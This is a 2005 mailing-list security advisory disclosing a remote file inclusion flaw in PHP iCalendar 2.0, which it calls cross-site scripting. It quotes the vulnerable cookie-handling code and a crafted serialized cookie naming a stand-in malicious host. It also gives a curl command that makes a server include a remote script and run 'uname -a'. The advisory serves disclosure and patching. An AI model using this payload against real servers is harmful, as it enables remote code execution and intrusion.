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Message-ID: <435E33B1.4070808@katamail.com>
Date: Tue Oct 25 14:32:10 2005
From: ascii at katamail.com (ascii)
Subject: PHP iCalendar CSS
PHP iCalendar CSS
Name Cross-Site-Scripting Vulnerabilities in PHP iCalendar
Systems Affected PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1
Severity Medium Risk
Vendor http://www.phpicalendar.net
Advisory http://www.ush.it/2005/10/25/php-icalendar-css/
Additional (it) http://www.ush.it/team/ascii/hack-PHP-iCalendar/adv.txt
Author Francesco 'aScii' Ongaro (ascii at katamail . com)
Date 20051023
I. BACKGROUND
PHP iCalendar is a php calendar, more information is available at the
vendor site.
II. DESCRIPTION
PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong
input validation in index.php and will include an arbitrary file
ending with .php.
The vulnerable code is:
> config.inc.php
$printview_default = 'no';
> index.php
if (isset($_COOKIE['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$printview = $default_view;
$default_view = "print.php";
} else {
$default_view = "$default_view".".php";
}
include($default_view);
As you can see there is no input validation at all.
III. ANALYSIS
This vulnerability can be exploited using an hand-crafted cookie with
the right serialized array inside.
a:1:{s:11:"cookie_view";s:23:"http://www.mali.cious/script";}
curl http://www.vic.tim/path/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cook
ie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww.
ush.it%2Fteam%2Fascii%2F-----%22%3B%7D' -d 'user=uname -a'
IV. DETECTION
PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 are vulnerable.
V. WORKAROUND
Input validation or header location will fix the vulnerability.
PHP no remote fopen and open basedir will play also (if not..).
VI. VENDOR RESPONSE
Vendor fixed the bug in the cvs tree, not verified.
http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail1.txt
http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail2.txt
VII. CVE INFORMATION
No CVE at this time.
VIII. DISCLOSURE TIMELINE
20051023 Bug discovered
20051024 Working exploit written
20051025 Sikurezza.org notification
20051025 Initial vendor notification
20051025 Initial vendor response
20051025 Vendor CVS fix
20051025 Public disclosure
IX. CREDIT
ascii is credited with the discovery of this vulnerability.
X. LEGAL NOTICES
Copyright (c) 2005 Francesco 'aScii' Ongaro
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